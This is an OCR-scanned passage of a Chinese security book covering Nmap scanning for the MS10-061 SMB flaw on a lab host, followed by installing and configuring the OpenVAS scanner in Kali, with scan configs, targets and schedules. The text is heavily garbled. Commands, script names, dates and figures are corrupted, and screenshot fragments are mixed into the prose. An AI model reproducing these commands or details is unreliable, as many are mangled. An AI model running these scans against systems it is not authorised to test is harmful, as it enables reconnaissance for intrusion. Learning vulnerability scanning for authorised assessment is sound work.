445/tcp open microsoft-ds 
MAC Address: O00:0C:29:FA:DD:2A (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 6.55 seconds 


使 用 Nmap -p 445 192.168.1.105 --script=smb-vuln-ms10-061 命 令 。 扫 描 主机 发 现 并 不 
存在 该 漏洞 。 这 个 现象 在 漏洞 扫描 中 也 很 正常 ， 并 不 是 所 有 开放 端口 的 机 器 都 存在 漏洞 ， 
执行 效果 如 下 图 所 示 。 


root@kali:/usr/share/nmap/scripts# nmap -p 445 192.168.1.105 --Script=Ssmb-vuLn-ms10-061 
starting Nmap 7.70 ( https://nmap.org ) at 2018-10-29 05:46 EDT 
Nmap Scan report for 192.168.1.165 

Host is up (0.00032S Latency ) . 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
MAC Address: 00:0C:29:FA:DD:2A (VMware) 


Host Script results: 
| smb-vuln-ms10-0661: false 


Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds 
root@kali:/usr/share/nmap/scripts# nmap -Pp 445 192.168.1.103 --Script=smb-vuLn-ms10-061 


12.4 使 用 OpenVAS 扫 描 漏 洞 


OpenVAS (Open Vulnerability Assessment System) 是 一 个 开放 式 漏洞 评估 系统 ， 其 核 a 
心 部 分 是 一 个 服务 器 。 该 服务 器 包括 一 套 网 络 漏洞 测试 程序 ， 可 以 检测 远程 系统 或 应 用 程 
序 中 的 安全 问题 。 


12.4.1 安装 OpenVA9 


默认 情况 下 ，Kali 系 统 并 没有 安装 该 扫 拉 工具， 因此 想 要 使 用 它 必 须要 先 安装 。 在 
Kali 系 统 中 安装 OpenVAS 的 操作 步骤 如 下 : 
在 Kali Linux 系 统 的 命令 执行 界面 中 输入 apt-get install openvas 命 令 ， 执 行 效果 如 下 图 
所 示 。 
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root@kali:~# apt-get install openvas 

正在 读 取 软件 包 列 表 ... 完成 

正在 分 析 软 件 包 的 依赖 关系 树 

正在 读 取 状 态 信息 ... 完成 

下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 
libbind9-160 Libdns1102 Libirs166 libiscl69 Libisccc1606 libisccfg160 
LibLwres160 libpoppler74 Libprotobuf-Litel6 Libprotobuf16 Libradare2-2.9 
Libunbound2 Libx265-166 python-backports.ssl-match-hostname 
python-beautifulsoup python-jwt ruby-terminal-table 
ruby-unicode-display-width 

使 用 'apt autoremove' 来 扼 载 它 (它们 )， 


[step 图 安装 过 程 会 提示 将 要 安装 哪些 库 及 支持 文件 ， 并 给 出 建议 安装 文件 ， 如 下 图 所 示 。 


将 会 同时 安装 下 列 软件 : 

doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredis0.14 Libtua5.1-0 
Libmicrohttpd12 libopenvas9 libradcli4 libuuid-perl libyaml-tiny-perl 
lua-cjson openvas-cli openvas-manager openvas-manager-common openvas-scanner 
preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

建议 安装 : 

rarian-compat openvas-client pnscan strobe ruby-redis 
texlive-fonts-recommended-doc icc-profiles libfile-which-per\ 
libspreadsheet-parseexcel-perl texlive-latex-extra-doc 
texlive-latex-recommended-doc texlive-pstricks dot2tex prerex ruby-tcltk 
| libtcltk-ruby texlive-pictures-doc vprerex 


[step 图 同时 ， 在 界面 的 下 面 会 提示 是 否 安 装 文件 ， 如 下 图 所 示 。 


下 列 【 新 】 软 件 包 将 被 安装 : 


doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredis0.14 liblua5.1-0 
Libmicrohttpd12 Libopenvas9 libradcli4 libuuid-perl libyaml-tiny-per\ 
lua-cjson openvas openvas-cli openvas-manager openvas-manager-common 
openvas-scanner preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

升级 了 9 个 软件 包 ， 新 安装 了 28 个 软件 包 ， 要 秃 载 6 个 软件 包 ， 有 9 个 软件 包 未 被 升级 。 
需要 下 载 85.6 MB 的 归档 。 

解压 缩 后 会 消耗 252 MB 的 额外 空间 。 
您 希望 继续 执行 吗 ? [Y/n] y 


[step 国 如 果 需 要 安装 ， 这 时 可 以 按 Y 键 执行 安装 ， 如 下 图 所 示 。 


[Se 图 夺 心 等 待 安装 完成 。 这 里 会 有 一 个 初始 密码 ， 一 定 要 先 保存 这 个 密码 ， 


ootEkali:~# openvas-setup 


>] Updating 0penVAS feeds 

=*] [1/3] Updating: NVT 

-2618-19-28 21:57:98-- http://dl.greenbone.net/community-nvt-feed-current.tar.bz2 
在 遂 析 主机 dl.greenbone.net (dl.greenbone.net)... 89.146.224.58，2a61:130:206D:127::d1 
在 连接 dl.greenbone.net (dl.greenbone.net)|89.146.224.58|:89... 已 连接 。 
发 出 HTTP 请 求 ， 正 在 等 待 回应 ... 269 OK 

发 匿 : 36297248 (29M) [application/octet-stream] 

正在 保存 至 :“/tmp/greenbone-nvt-sync.ULkb7TZ4I3/openvas-feed-2018-10-28-5266.tar.bz2" 


rtmp/greenbone-nvt-sync.UL 100%[===—========—=—=====———==——============»] 28.8]M 6.65MB/s 用 时 5.7s 


R618-10-28 21:57:16 (5.65 MB/s) - 已 保存 “/tmp/greenbone-nvt-sync.ULkb7TZ4I3/openvas-feed-2918-19-28- 
5266. tar.bz2” [3062907248/309207248]) 


录 系 统 ， 如 下 图 所 示 oO 


[FJ Opening Web UI (https://127.0.0.1:9392) in: 5...4...3...2... 工 ..4 


[>] Checking for admin user 
[*] Creating admin user 初始 密码 
User created with password (l'fd439f97-19018-470d-a3f2-229f79026c179'|. 


[+ Done 


否则 无 法 登 


由 于 OpenVAS 是 一 个 非常 庞大 的 漏洞 扫描 库 ， 因 此 安装 过 程 中 可 能 会 出 现 文件 缺少 
等 错误 ， 这 时 ， 可 以 使 用 openvas-check-setup 命 令 ， 检 查 安 装 是 否 完 整 ， 如 下 图 所 示 。 
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Seems (ixKe your Upen -3 Ins3LaLLatlIon 15s . 


If You think it is not 0K, please report your observation 

and help us to improve this check routine: 
nttp://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 
Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem) 


侈 提示 : 在 检查 安装 结果 中 ， 如 果 看 到 提 

示 OK， 表 明正 常安 装 完 成 ， 如 果 出 现 错 
这 里 会 给 出 尝试 修复 的 建议 。 

如 果 安 装 完 成 忘记 保存 初始 密码 ， 

ee 以 通过 openvasmd --get-users 命 令 ， 查 看 

OpenVAS 中 都 有 哪些 用 户 ， 当 然 如 果 是 初次 

安装 只 会 有 一 个 管理 员 账 号 ， 如 下 图 所 示 。 


oot@kali:/usr/share/nmap/scripts# openvasmd a 


由 于 OpenVAS 是 安全 漏洞 扫描 工 
具 ， 为 了 保证 扫描 的 准确 性 ， 建 议 经 常 
对 软件 进行 升级 ， 这 时 可 以 使 用 Updating 
OpenVAS feeds 命 令 对 OpenVAS 进 行 定期 检 
查 升 级 ， 如 果 存 在 升级 会 自动 进行 更 新 。 
下 图 为 截取 的 部 分 更 新 信息 。 


[>] Updating OpenVAS feeds 
*] [1/3] Updating: NVT 


Bent 159,119 bytes received 12,217,759 bytes 575,668.74 bytes/sed 
Fotal size is 247,6956,755 ep is 19.96 

[" ] [2/3] Updating: Scap Da 

ent 328,324 bytes a 4,213,608 bytes 259,538.97 bytes/sec 
Kotal size is 992.859,082 speedup is 218.60 

Usr/sbin/,openvasmd 

[*] [3/3] Updating: Cert Data 

sent 22,771 bytes received 134,431 bytes 34,933.78 bytes/sec 
total size is 55,172,448 speedup is 356.97 

/usr/sbin/openvasmd 


Firefox has not connected to this website. 


Learn more... 


dour connection is not secure 


The owner of 127.0.0.1 has configured their website improperly. To protect your information from being stolen, 


Report errors like this to help Mozilla identify and block malicious sites 
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12.4.2 ”登录 OpenVAS 


安装 完 OpenVAS 软 件 ， 并 设置 好 账号 
密码 后 ， 便 可 以 登录 OpenVAS。OpenVAS 
采用 Web 登 录 ， 管 理 起 来 非常 方便 。 初 次 登 
录 OpenVAS 需 要 一 些 简单 的 设置 ， 具体 的 
设置 步骤 如 下 : 
OpenVAS 局 动 后 会 打开 一 些 939 系 列 
端口 。 使 用 netstat -pantu | grep 939 命 令 查看 
端口 信息 并 过 滤 出 939 系 列 端口 ， 执 行 效 果 
如 下 图 所 示 。 其 中 9390 是 OpenVAS 服 务 端 
口 ，9392 是 Web 登录 端口 。 


oot@kali:~# netstat -pantu | grep 939 
cp 0 0 127.0.0.1:93909 0.0.0.0:+ LISTEN 6512/0penvasmd 
cp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 6510/gsad 


如 果 9392 端 口 开放 ， 便 说 明 OpenVAS 
的 服务 已 经 启动 ， 通 过 浏览 器 可 以 登录 Web 
页 面 ， 初 次 登录 会 有 警告 信息 ， 如 下 图 
所 示 。 


Advanced 


这 是 由 于 OpenVAS 采 用 HTTPS 加 窗 传 输 协 议 ， 因 此 会 提示 安装 证 书 问题 ， 


这 时 需 在 


警告 信息 界面 中 单 击 Advanced 按 钮 ， 进 入 下 图 所 示 的 界面 。 


127.0.0.1:9392 uses an invalid security certificate. 


The certificate is not valid for the name 127.0.0.1. 


Error code: SEC_ERROR_UNKNOWN _ISSUER 


The certificate is Not trusted because the issuer certificate is unknown. 
The server might not be sending the appropriate intermediate certificates. 
An additional root certificate may need to be imported. 


Add Exception... 


侈 注意 : 如 果 是 本 机 登录 可 以 使 用 https:// 127.0.0.1:9392/ 进 行 登录 。 


单 击 Add Exception 按 钮 ， 会 弹出 一 个 确认 添加 证 书 的 警告 信息 


， 如 下 图 所 示 。 
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Add Security Exception @ 
9 You are about to ovarride how Firefox identifies this site. 


Legitimate banks, stores, and other public sites will not ask you to do this. 
Server 


Location: https://127.0. 国 列国 | Get Certificate ] 


Certificate Status 
This site attempts to identify itself with invalid information. ] 


WrongSite 


The ccrtificatc bclongs to a diffcrcnt sitc, which could mcar that somconc is trying to impcrsonatc this sitc. 
Unknown Identity 


The certiflcate is not trusted because it hasn’t been verifledas issued by a trusted authority using a secure signature. 


[Permanently store this exception 


| Confirm Security Exception | ] Cancel ] 


单 击 Confirm Security Exception 按 钮 ， 确 认 添 加 安全 证 书 ， 并 跳 转 到 下 图 所 示 的 登录 
界面 ， 在 其 中 输入 管理 员 账 号 与 密码 。 


Username: 
要 


Geraanioma 
Security 
Assistant 


Password: 


单 击 Longin 按 钮 ， 进 入 下 图 所 示 的 主 界面 。 


Extrae Adrministration 


也 Dashboard 


(多 注意 : 如 果 系 统 重 启 后 ， 默 认 OpenVAS 不 自动 启动 ， 需 要 手动 开启。 手动 开启 的 命令 
为 openvas-start， 执 行 效 果 如 下 图 所 示 。 


root@kali:~# openvas-start 

[*] Please wait for the OpenVAS services to start. 

[*] 

[*] You might need to refresh your browser once it opens. 
[*] 

[*] Web UI (Greenbone Security Assistant): https://127.0.0.1:9392 


12.4.3 ”配置 OpenVAS 
登录 OpenVAS 后 ， 便 可 以 配置 相关 扫描 信息 ，OpenVAS 提 供 了 丰富 的 配置 选项 ， 既 可 
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以 配置 快速 扫描 选项 ， 也 可 以 手动 配置 个 
性 化 扫描 选项 。 下 图 为 OpenVAS 框 以 的 运 


行 示 意图 。 


.OpenVAS 

大 致 分 为 以 下 几 个 组 件 : 

e Scanner 组件: 用 于 扫描 ， 它 会 从 
NVT 数 据 库 中 提取 漏洞 信息 。 

e Manager 组 件 : 用 于 管理 Scanner 组 
件 ， 所 有 的 配置 信息 保存 在 Configs 
数据 库 中 。 

e CLI 组 件 : 指令 控制 组 件 ， 用 于 对 


sluallo 


Scan Targets  、 


. 
+ 


seoleSs 


| 
J 


和 
中 
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首次 登录 OpenVAS， 可 以 修改 一 些 基 
本 信息 。 操 作 步 骤 如 下 : 
在 OpenVAS 首 页 中 ， 选 择 Extras 菜 单 ， 
在 打开 的 菜单 列表 中 选择 My Settings 菜 单 命 
令 ， 如 下 图 所 示 。 


Performance 
CYSS Calculator 
Feed Status 


都 可 以 找到 一 个 类 似 扳 手 的 图 标 ， 如 下 图 
所 示 。 


【而 My Settings 


Manager 下 达 指 令 。 单 击 扳手 图 标 ， 进 入 基本 设置 修改 页 
e@ Security Assistant 组 件 : 用 于 分 析 扫 ” 面 ， 如 下 图 所 示 。 在 这 里 可 以 修改 时 区 、 
描 漏 洞 并 生成 报告 文档 。 用 户 密码 以 及 语言 环境 等 。 
Edit My Settings 
Namie Value 
Timezone LCoordinated Universal Time ~ | 
Old eeeeoeeee | 
Password 
New 


User Interface Language Browser Language 


Rows Per Page 10 

Details Export File Name %T-%U 
List Export File Name %T-%D 
Report Export File Name %T-%U 


” 


Severity Class | NVD Vulnerability Severit... ™ 
Dynamic Severity No 
Default Severity ] 10.0 


默认 情况 下 ，OpenVAS 的 漏洞 评测 标准 是 NVD 模 式 ， 如 果 需 要 修改 ， 可 以 单 击 
Severity Class 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 选择 不 同形 式 的 评分 标准 ， 如 下 图 所 
示 ， 其 中 包括 BSI、OpenVAS、PCI-DSS 等 标准 。 
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NVD Vulnerability Severity 


Details Export File Name Ratings 


BSI Schwachstellenampel 


List Export File Name (Germany) 


OpenVAS Classic 


Report Export File Name 
PCI-DSS 


NVD Vulnerability Severit... < 


Severity Class 


设置 完成 后 ， 单 击 下 方 的 Save 按 
钮 ， 即 可 保存 设置 ， 并 退出 基本 设置 修改 
页 面 。 


12.4.4 上 和 目 定义 扫 摘 

默认 情况 下 ，OpenVAS 提 供 了 多 种 扫 
描 配 置 ， 不 过 这 些 都 是 通用 的 ， 如 果 需 要 
针对 某 些 特定 的 设备 进行 扫描 ， 则 需要 自 
定义 配置 。 


1. 设置 扫描 配 置 


开始 扫描 之 前 需要 先 设 置 一 个 扫描 配 
置 ， 创 建 和 目 定 义 扫 描 配 置 的 操作 步骤 如 下 : 
选择 Configuration 菜 单 ， 在 打开 的 菜 


单列 表 中 选择 Scan Configs 菜 单 命 令 ， 如 下 


图 所 示 。 


Targets 


Port Lists 


Credentials 


打开 Scan Configs 对 话 框 ， 在 其 中 可 
以 查看 OpenVAS 的 默认 扫描 配置 项 ， 如 下 
图 所 示 ， 包 括 Discovery (发 现 型 扫描 ) 、 
empty 〈 一 个 空 的 扫描 ) 、Full and fast《〈 完 
整 的 快速 扫描 ) 、Full and fast ultimate 〈 完 
整 快 速 极 限 扫 描 ) 、Full and very deep 〈 非 
第 深度 扫描 ) 、Full and very deep ultimate 

(深度 极限 扫描 ) 、Host Discovery (主机 
发 现 扫 描 ) 、System Discovery (系统 发 现 
扫描 ) 等 ， 除 此 之 外 还 可 以 看 到 每 个 扫描 
配置 的 漏洞 分 类 以 及 NVT 数 量 。 


a Scan Configs (8 of 8) 


Discove 
(Network Discovery scan configuration.) 


empty 

(Empty and static configuration template.) 

Full and fast 

(Most NVT's; optimized by using previously collected information.) 
Full and fast Ultimate 


Full and very deep 
(Most NVT's; don't trust previously collected information; 5low.} 


Full and very deep ultimate 

(Most NVT's including those that can stop services/hosts; don't trust previously collected information; slow.) 
Host Discove 

(Network Host Discovery scan configuration.) 


System Discovery 
(Network System Discovery scan configuration.) 


(Most NVT's including those that can stop services/hosts,; optimized by using previously collected information.) 


rot [rrene rena | 

图 2 BB 237 加 回 本 口中 
国 。 © 。 已 加 马 口 B 
加 。， 加 48034 思 ” 章 加 器 
62 加 48034 加 OOO 
号 62 加 so 加 园丁 口上 
62 回 48034 加 团 劝 口中 
到 : BB : 马上 园丁 口 吕 
加 6 加 ”29 局 回 马 口 D 


单 击 左上 方 的 “创建 ”图 标 ， 可 以 创 
建 自 定义 配置 ， 如 下 图 所 示 。 


scan Configs 


打开 New Scan Config 对 话 框 ， 在 其 中 
输入 新 建 扫描 的 名 称 、 备 注 信 息 以 及 基础 
配置 ， 如 下 图 所 示 。 


New Scan Config 
WOS-Scan 


Base  (e) Empty static and last 
) Full and fast 
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step 图 输入 完成 后 ， 单 击 Create 按 钮 ， 进 入 
编辑 扫描 配置 界面 ， 如 下 图 所 示 。 


New Scan Config 


Name Windows-scan| 


Comment 


Base  (e®) Empty static and fast 
) Full and fast 


Lcreate | 
[step 图 在 Family 选 项 中 有 两 个 单 选 按钮 ， 其 
中 第 1 个 是 箭头 向 上 的 图 标 ， 选 中 它 代表 如 
果 后 续 有 漏洞 更 新 自动 加 入 扫描 配置 ， 和 葡 
头 向 右 的 图 标 如 果 选 中 ， 代 表 仅 当前 这 些 


配置 项 ， 即 使 后 续 有 更 新 也 不 自动 添加 ， 
如 下 图 所 示 。 这 里 建议 选择 第 1 项 ， 如 有 特 
殊 需 要 可 以 选择 第 2 项 


Famiy 令 团 O® 


因为 这 里 的 配置 是 针对 Windows 系 
统 的 漏洞 扫描 ， 因 此 会 去 除 一 些 不 必要 的 
漏洞 扫描 。 配 置 项 1 如 下 图 所 示 ， 其 中 包 
括 Brute force attacks ( 骏 力 破解 ) 、Buffer 
overflow (缓冲 区 溢出 ) 、Compliance ( 合 
规 性 ) 、Databases (数据 库 ) 等 


Famiy 仿 国 合 率 NVTs selected Selest all NVTs 

AIX Local Security Checks 0 of1 FO 
Amazon Linux Local Security Checks 0 of 749 FO 
Brute torce attacks 0of9 FO 加 
Buffar overllow 0 of 562 PO 局 
CISCO 0 of647 FO 
CentO5 Local Security Checks 0 of 2471 FO 
Citrix Xenserver Local Security Checks 0 of 30 FO 
Compliance 0 of7 PO | 
Databases 0 of 550 页 加 | 可 
配置 项 2 如 下 图 所 示 ， 其 中 包 
sil Accounts (默认 账户 ) Dui 


of Service (拒绝 服务 ) 、FTP (FTP 服 务 
器 ) 、Finger abuses 〈 滥 用 ) 、Gain a shell 
one (远程 获取 shell) 、General (通用 
性 ) 等 


Default Accounts 0 of 216 机 [口号 | 
Denial of Service 0 of1356 FO 
F5 Local Securlty Checks 0 of125 FO 
-一 0 of173 FO 器 本 
Fedora Local Security Checks 0of10616 FO 
Finger abuses 0 of6 FO [| 
Firewalls 0 of18 FO 
ForiOS Local Security Checks 0 of 34 A IO Ce 
FreeBSD Local Security Checks 0 of 437 FO 
Gain a shell remotely 0 of 106 FO 
General 0 of 4299 FO 


配置 项 3 如 下 图 所 示 ， 其 中 包括 
EE (恶意 软件 ) 、Nmap NSE (Nmap 
脚本 ) 、Nmap NSE net (Namp 网 络 脚本 ) 、 
Peer-To-Peer File Sharing 〈 点 对 点 文件 共 
享 ) 、Policy (策略 ) 、Port scanners( 端 
口 打 描 ) 、Privilege escalation 〈 提 权 ) 
Product detection (产品 检测 ) 、RPC 等 。 
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Maiware 0of50 而 [口号 | 加 
Mandrake Local Security Checks 0of402 FO 
Netware 00T8 IO 一 
Nmap NSE 0of154 IO 中 加 ca 
Nmap NSE net 0 of 177 FO 
Pracle Linux Local Security Checks 0 of 1895 FO 
palo Aito PAN-OS Local Securlty Checks 0 of40 Ol 男 
Peer-To-Peer File Sharing 0of21 FIO | | 
Policy 0 of656 Ol 
Port scanners 0 of15 FO [|] 
Privilage escalation 0 of60 FO = | 
Product detection 0 of 2059 FO 
RPC 0of11 FIOl™*| 


配置 项 4 如 下 图 所 示 ， 其 中 包括 Remote 

access 《远程 文件 访问 ) 、SMTP problems 
(SMTP) 、SNMP (SNMP) 、 SSL and TLS 
(SSL 和 和 TLS 协议 ) 、Service detection (服务 

检测 ) 、Settings (设置 ) 、Useless services 
(无 用 的 服务 ) 等 


Remote file access 0of58 再 [口号 | 
BMTP problems 0 of52 FO 
SNMP 0 017 FO 
SSL and TLS 0 of63 FO 图 
Bervice detection 0of217 FO 
Betings 0 of12 FO | 
Slackware Local Security Checks 0of534 FO 
Bolaris Local Security Checks 0 of1 FO 
BuSE Local Security Checks 0 of 1426 IO 男 | 
bbuntu Local Security Checks 00T3119 FO 
Useless Services 0 of 14 FO 加 ca 
MMware Local Security Checks 0 of58 FO 
Web Servers 0 of 400 FIOl~*| 


配置 项 5 如 下 图 所 示 ， 其 中 包 
a 以 及 Windows:Microsoft De 
(微软 公告 ) 等 


indows 0 of181 Ol | 
indows : Microsoft Bulletins 0 of1967 PIO ji 
otal:0 0of0 hd 


设置 完成 后 ， 单 击 Save 按 钮 保存 配 
置 ， 再 返回 界面 的 下 方 ， 可 以 看 到 已 经 
添加 了 自 定义 扫描 项 ， 具 体 信 息 包 括 27 项 
19059 种 漏洞 ， 如 下 图 所 示 。 至 此 ， 便 成 功 
创建 了 针对 Windows 系 统 的 扫描 配置 。 


ost Discovery 区 
Network Host Discovery scan configuraticon.) = = = = Daud 
ystem Discovery 区 9 
INetwork System Discovery scan configuration.) 8 一 2 一 回 劝 马 辐 
nawos-scan 
Empty and static configuration template.) 了 ~ 二 =- Deno0 


人 @ 注 意 : 自 定义 扫描 项 的 右 侧 提供 了 删 
余 、 人 修改、 复制 、 手 出 功能 ， 默 认 配 置 项 
是 不 可 以 删除 和 修改 的 。 


AW 


二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


2. 创建 扫描 对 象 建 ” 图 标 ， 创 建 目标 对 象 如 下 图 所 示 。 


开始 漏洞 扫描 之 前 需要 确定 扫描 对 象 - 
而 OpenVAS 中 任何 的 动作 都 需要 提前 进行 ee 
配置 。 创 建 扫描 对 象 的 操作 步骤 如 下 ; kK» 
选择 Configuration 菜 单 ， 在 打开 的 Targets 
菜单 列表 中 选择 Targets 菜 单项 ， 如 下 图 打开 New Target 对 话 框 ， 在 其 中 输入 


所 示 。 目标 名 称 ， 如 下 图 所 示 。 目 标 地 址 有 两 种 
方式 : 
Port Lists 十， 多 地 址 之 间 使 用 如 与 分 隔 。 
Credentinks (2) 选择 From file 项 ， 可 以 将 需要 扫描 的 
Scan Configs 


IP 地 址 保存 成 文件 ， 最 后 导入 该 文件 。 
step 图 在 打开 的 界面 中 ， 单 击 左上 角 的 “ 创 


NA 


Name Winodw-PC1 
Comment 
(e) Manual | 192.168.1.103 
Hosts () From file | Browse.. |Nofile selected. 
选择 需要 扫描 的 端口 ， 这 里 提供 了 AIl IANA assigned TCP 20... a 


非常 多 的 选项 ， 有 针对 TCP/UDP 的 单独 选 
项 ， 还 有 针对 常用 端口 的 选项 以 及 全 端口 


Alive Test ] 


Credentials for authenticated UDE 和 

扫描 等 。 这 时 可 以 单 击 下 拉 按 钮 ， 在 弹出 i All TCP 

的 下 拉 列 表 中 进行 选择 ， 如 右 图 所 示 。 这 All TCP and Nmap 5.51 

里 选择 OpenVAS Default 选 项 ， 当 然 如 果 想 js en 

自 定义 端口 ， 也 可 以 单 击 右 侧 的 “创建 ”5% TCP 3nd top 100 UDP 

图 标 自 行 创 建 。 ee OpenVAS Default 
主机 探测 也 同 样 提供 4 丰 富 的 选项 、 Port List OpenVAS Default 了 去 
这 里 选择 Consider Alive 选 项 ， 即 使 主机 不 live Test Consider Alive v 


响应 探测 数据 包 ， 》 也 依然 认为 主机 是 存活 Credentials for 
状态 ， 并 完成 扫描 ， 如 右 图 所 示 。 


基本 选项 都 设置 完成 后 ， 单 击 Create 按 钮 ， 即 可 完成 创建 。 在 返回 的 页 面 中 可 以 看 
到 已 经 创建 好 的 主机 列表 ， 如 下 图 所 示 。 


的 en (1 of 1) 


1-10of1 
rp 


Windwos-PC1 192.168.1.103 1 OpenVAS Default 问 西 同和 
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注意 : 在 Configuration 菜 单列 表 中 有 一 个 Port Lists 菜 单 ， 


。 修 改 后 的 端口 列表 如 下 图 所 示 。 
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Port Lists (9 of 9) 


AII IANA assigned TCP 2012-02-10 

All IANA assigned TCP and UDP 2012-02-10 
All privileged TCP 

All privileged TCP and UDP 

All TCP 

All TCP and Nmap 5.51 top 100 UDP 

All TCP and Nmap 5.51 top 1000 UDP 
Nmap 5.51 top 2000 TCP and top 100 UDP 
OpenVAS Default 


国 5525 
10988 
区 1023 
2046 
东 65535 
园 65634 
匡 66534 
世 2098 


十 4481 


5625 0 轩辕 回回 
5625 5363 轩辕 回回 
1023 0 辐 罗 四 四 
1023 1023 轩辕 加 四 


3. 创建 扫 摘 任务 


这 个 菜单 可 以 修改 扫描 的 


设置 完 目 定义 扫描 配置 并 创建 好 扫描 对 象 后 ， 接 下 来 便 可 以 创建 一 个 扫描 任务 。 
OpenVAS 的 扫描 任务 设置 也 是 非常 的 灵活 ， 可 设 定 在 规定 的 时 间 进 行 扫 描 ， 也 可 设置 周期 
性 扫描 ， 这 样 更 加 符合 漏洞 管理 的 要 求 。 创 建 扫描 任务 的 操作 步骤 如 下 : 


[step 较 在 打开 的 界面 中 ， 单 击 左上 角 的 “ 创 
Configuration 菜 单 ， 在 打开 的 菜单 列表 中 选 二 图 标 ， 创 建 一 个 扫描 任务 ， 如 下 图 所 示 。 


创建 一 个 扫描 调度 计划 ， 选 择 


择 Schedules 菜 单项 ， 如 下 图 所 示 。 


Report Formats 


Agents 


Edit Schedule 《 


Name everyday Scan 


Comment 


First Time Tuesday, 30 October, 2018 


7] 于 | 


Schedules 


打开 Edit Schedules 对 话 框 ， 在 其 中 可 
以 设置 调度 的 名 称 ， 可 以 选择 初次 扫描 的 
时 间 ， 还 可 以 选择 以 后 计划 扫描 的 时 间 ， 

如 下 图 所 示 。 


Timezone Coordinated Universal Time ™ 


Period 


5 上 hour(s) 


Duration 


step 四 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 调度 任务 ， 如 下 


图 所 示 。 
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Schedules (1 of 1) 


everyday scan Tue Oct 30 03:10:00 2018 UTC Wed Oct 31 03:1000 2018 UTC 


(Apolied filter: rows=10 first=] sort 


[step 图 选择 Scans 菜 单 ， 在 打开 的 菜单 列表 ”[step 较 在 打开 的 界面 中 ， 单 击 左 上 角 的 “ 创 
中 选择 Tasks 菜 单项 ， 如 下 图 所 示 。 建 ”图 标 ， 创 建 一 个 扫描 任务 ， 如 下 图 所 示 。 


Oe Da 
Dashboard EN 

Pepe V Tasks 
Results 1 


打开 New Tasks 对 话 框 ， 在 其 中 可 以 设置 扫描 任务 的 名 称 ， 还 可 以 调用 之 前 创建 好 的 
调度 配置 、 扫 描 配 置 等 ， 如 下 图 所 示 。 


AN 


Name New _ Scan 
Comment 
Scan Targets | Windwos-PC1 | 加 
Alerts | 
Schedule | everyday scan once 加 
Add results to  (e) yes no 
Assets 
Apply Overrides (e) Yes no 
Min QoD % 
Alterable Task yes (e®) no 
Auto Delete (e) Do notautomatically delete reports 


Reports 
Automatically delete oldest reports but always keep newest reports 
Scanner OpenVAS Default 本 
scan Config Windwos-scan 


[step 辆 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 扫描 任务 ， 如 下 
图 所 示 。 


1 - 1of 1 
Severity 图 |Trend 
lta 


New Scan Eo > | 上 回 加 
vApply to page contents w 他 | 时 | 
Applied filter: min qod=70 apply overrides=1l rows=10 first=] sort=name 1-1of1l 


人 注意 ; 右 侧 的 时 钟 图 标 可 以 修改 调度 计划 ， 类 似 播放 按钮 可 以 在 计划 启动 后 停止 当前 
扫描 任务 。 


4. Linux_Unix 扫 摘 配 置 
前 面 学 习 了 如 何 创建 自 定义 扫描 ， 这 里 再 给 出 一 个 自 定义 Linux 系 统 的 扫描 配置 ， 相 


ppA 0 


信 经 过 这 两 种 系统 的 配置 ， 读 者 一 定 能 够 
掌握 创建 自 定 义 扫 描 配 置 的 方法 。 

创建 Linux 扫 描 配 置 也 需要 经 历 相 同 的 
一 些 步 又， 这 里 省 去 了 相同 的 步骤 ， 
出 最 终 的 配置 项 ， 所 需 步 又 如 下 : 
通过 新 建 扫描 配置 ， 也 可 以 通过 复制 
已 有 的 扫描 配置 进行 修改 。 这 里 选择 复制 
已 有 的 扫描 配置 进行 修改 ， 在 扫描 配置 页 
中 选择 左 侧 的 复制 图 标 ， 在 打开 Edit Scan 
Config 对 话 框 中 输入 扫描 配置 名 称 ， 如 下 图 
所 示 。 


Edit Scan Config 


Linux_Unix_Scan 


Name 


Comment 


Edit Network Vulnerability Test Families 
Linux 配 置 项 1， 如 下 图 所 示 。 


Most NVTS; optimized by using previous 


AIX Local Security Checks 1of1 ,a 

Amazon Linux Local Security Checks 748 of 748 

Brute force attacks 9of9 OA 加 

Bufferoverilow 562 of 562 OO 

clsco 647 of 647 OF 加 

CentOS Local Security Checks 2471 0f2471 Ol FO 回 

Citix Xenserver Local Security Checks 30 of 30 On 3 

Compliance 7of7 SO 加 

Databases 550 of 550 OF 
Linux 配 置 项 2， 如 下 图 所 示 。 
Debian Local Security Checks 2830 of 2830 On@™~ 
Default Accounts 216 of 216 On@~ 
Denial of Service 1356 of 1356 OF@~ 
F5 Local Security Checks 125 of 125 OF@~ 加 
FTP 173 of173 O 〇 二 图 咏 
Fedora Local Security Checks 10616 of 10616 On@= 
Finger abuses 6of6 (区 ed 
Firewalls 18 of 18 On@~ 
FortiOS Local Security Checks 34 of 34 Or@™ 加 | 
FreeBSD Local Security Checks 437 of 437 On =. 
Gain a shell remotely 106 of 106 On@™ 
General 4298 of 4299 On@= 
Gentoo Local Security Checks 693 of 693 On@= 
HP-UX Local Security Checks 15 of 15 On@~ 


Linux 配 置 项 3， 如 下 图 所 示 。 
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IT-Grundschutz 
IT-Grundschutz-10 
IT-Grundschutz-11 
IT-Grundschutz-12 
IT-Grundschutz-13 
IT-Grundschutz-15 

JUuNOS Local Security Checks 
Mac OS X Local Security Checks 
Mageia Linux Local Security Checks 
Malware 

Mandrake Local Security Checks 
Netware 

Nmap NSE 


Nmap NSE net 


Linux 配 置 项 4， 


Oracle Linux Local Security Checks 
Palo Alto PAN-OS Local Security Checks 
Peer-To-Peer File Sharing 

Policy 

Port Scanners 

